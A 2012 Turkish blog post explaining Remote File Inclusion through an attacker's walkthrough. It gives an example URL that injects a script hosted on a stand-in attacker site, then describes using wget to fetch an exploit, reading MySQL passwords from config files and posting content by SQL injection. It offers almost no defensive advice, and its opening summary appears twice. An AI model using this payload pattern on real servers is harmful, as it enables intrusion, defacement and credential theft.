22 Mayıs 2012 Salı

Remote File Inclusion (RFI) Kesinlikle Bakılması Gerek

Yazar kerem yasar Saat 05:46 Yorum yok

ÖZET
 Remote File Inclusion (RFI) günümüzde sıklıkla web sayfalarının deface edilmesinde veya web sunucularının hack edilmesinde kullanılan bir yöntem olmuştur. Bu kadar çok hataya neden olan web kodlarını yazan veya geliştirenlerin dikkatsizce kod yazmaları, sistem yöneticilerinin de sunucular üzerinde yeteri kadar önlem almamalarıdır




                               Saldırı Senaryosu
 Birçok kurum veya kişi php yada asp vb. dillerinde kod yazmayı bilmedikleri için veya hazır kaynak kodu açık portallar veya scriptleri kullanması daha kolay geldiği için bu tarz kodları kullanmaktadırlar. Bu scriptlerde yada kodlarda yazan kişi tarafından kasıtlı olarak bırakılabileceği gibi dikkatsizlik sonucu ortaya çıkan XSS veya RFI açıkları aynı kodu kullanan başka kişiler tarafından farkedilebilir ve kötü amaçlı olarak başkaları ile paylaşıldığında web üzerinde çok fazla saldırı oluşabilir (mass defacement). Birçok site google dorks diye adlandırılan yöntemle bu açıkları yayınlamakta hatta exploitlerini bile derlenmiş olarak barındırmaktadır. Birçok art niyetli insan tarafından ziyaret edilen bu siteler sayesinde açık kaynak kodlu portalları kullanan kişilerin web sayfaları ve sunucuları zarar görmektedir. Bu tarz saldırıların nasıl yapılabileceğini aşağıda göstererek açıklayamaya çalışacağız. Bu saldırıların nasıl yapıldığına dair bir şekil aşağıda gösterilmiştir.


ÖZET Remote File Inclusion (RFI) günümüzde sıklıkla web sayfalarının deface edilmesinde veya web sunucularının hack edilmesinde kullanılan bir yöntem olmuştur. Bu kadar çok hataya neden olan web kodlarını yazan veya geliştirenlerin dikkatsizce kod yazmaları, sistem yöneticilerinin de sunucular üzerinde yeteri kadar önlem almamalarıdır. Saldırı Senaryosu Birçok kurum veya kişi php yada asp vb. dillerinde kod yazmayı bilmedikleri için veya hazır kaynak kodu açık portallar veya scriptleri kullanması daha kolay geldiği için bu tarz kodları kullanmaktadırlar. Bu scriptlerde yada kodlarda yazan kişi tarafından kasıtlı olarak bırakılabileceği gibi dikkatsizlik sonucu ortaya çıkan XSS veya RFI açıkları aynı kodu kullanan başka kişiler tarafından farkedilebilir ve kötü amaçlı olarak başkaları ile paylaşıldığında web üzerinde çok fazla saldırı oluşabilir (mass defacement). Birçok site google dorks diye adlandırılan yöntemle bu açıkları yayınlamakta hatta exploitlerini bile derlenmiş olarak barındırmaktadır. Birçok art niyetli insan tarafından ziyaret edilen bu siteler sayesinde açık kaynak kodlu portalları kullanan kişilerin web sayfaları ve sunucuları zarar görmektedir. Bu tarz saldırıların nasıl yapılabileceğini aşağıda göstererek açıklayamaya çalışacağız. Bu saldırıların nasıl yapıldığına dair bir şekil aşağıda gösterilmiştir. Şekil 1. Saldırı aşamaları Küçük bir örnekleme ile konunun ne kadar önemli olduğunu görelim.
Açık farkedildikten sonra web adresinden başka bir sunucu üzerinde bulunan scriptimizi çalıştırıp veya dosya yükleme izinleri düzgün olarak verilmemişse sunucunun üzerine yükleyerek sistem shell’ine ulaşmamıza neden oldu. Bizim kullandığımız yöntemde sunucu kodlama hatasını kullanarak sistem shell’ine erişim sağlanmıştır. Web adresine aşağıdaki http://saldirganinsitesi.com/erisim.php adresi eklenerek adresi http://sizinsiteniz.com/yanliskod.php?hatalidir=http://saldirganinsitesi.com/erisim.php haline getirip url sayesinde sisteme sızmış olduk. Burdan sonra yapılacak birkaç şey var. Eğer sistem yöneticisi sistem dizinlerinin izinlerini iyi ayarlamamışsa dosya yazıp silebilir hatta shell erişimi ile yapabileceğiniz herşeyi yapabilirsiniz. Bizim örneğimizde sadece /tmp dizini erişime açık olduğu için


neler yapılacağı farklı bir yol izlenerek bulunmuştur. Örneğimizde herhangi bir derlenmiş exploit sisteme wget vasıtasıyla yüklendi ve çalıştırma denemesi yapıldı. Sonuç: başarılı. Daha sonra web kullanıcısının dizinleri altındaki konfigürasyon dosyalarından birisi ile mysql şifreleri okunup sistemin veritabanı vasıtasıyla sql injection yöntemi kullanılarak post metoduyla sunucuya haberler ve dökümanlar eklendi. Örnek için aşağıdaki resime bakabilirsiniz. Sisteme sızdıktan sonra herşey sizin yetenek ve yaratıcılığınıza kalıyor.


Şekil 2. Sunucuya ilk erişim Sunucuya yukarıdaki gibi ilk erişimde karşınıza açığını bulup kullandığınız domainin dizini çıkar. İleriki aşamalarda dizin değiştirmek gerektiğinde uygun komut vererek gitmek istediğiniz dizine ulaşabilirsiniz.
Categories: , , ,

0 yorum:

Yorum Gönder

Kaydol: Kayıt Yorumları (Atom)